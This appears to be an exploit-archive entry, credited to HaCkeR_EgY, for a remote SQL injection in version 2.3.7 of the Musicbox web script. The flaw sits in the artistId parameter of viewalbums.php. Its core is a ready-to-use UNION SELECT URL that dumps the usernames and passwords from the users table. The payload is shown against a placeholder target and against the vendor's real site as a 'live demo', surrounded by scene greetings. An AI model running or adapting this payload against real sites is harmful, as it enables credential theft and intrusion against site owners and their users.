Musicbox <= 2.3.7 (artistId) Remote SQL Injection Vulnerability

2008-05-07T00:00:00
ID 1337DAY-ID-2972
Type zdt
Reporter HaCkeR_EgY
Modified 2008-05-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
Musicbox <= 2.3.7 (artistId) Remote SQL Injection Vulnerability
===============================================================




#########################################
#    Rem0te SQL Injection Vulnerability #
#       Musicbox [viewalbums.php]       #
########################################

[<>]Author: HaCkeR-EgY

===========================================================
[<>]Script : Musicbox
 
[<>]version : Version 2.3.6 / 2.3.7
 
[<>]Script Price: Only $ 255.00
 
[<>]Download : www.musicboxv2.com
============================================================
 
[<>] D0RK : ... you know
 
[<>] ExPLO!t :
             
  ===>
http://www.target.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
 
 
[<>] live DemO :
            
  ===>
  http://www.musicboxv2.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
 
==============================================================
[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "
 
[<>] Greetz : F!resell , Mohamed el Arab ,Mr.EXE , DaRk MaStEr ,H-T Team
                   Gold_M , V4 Team , Jiki Team  , RoMaNcYxHaCkEr
===============================================================



#  0day.today [2018-03-14]  #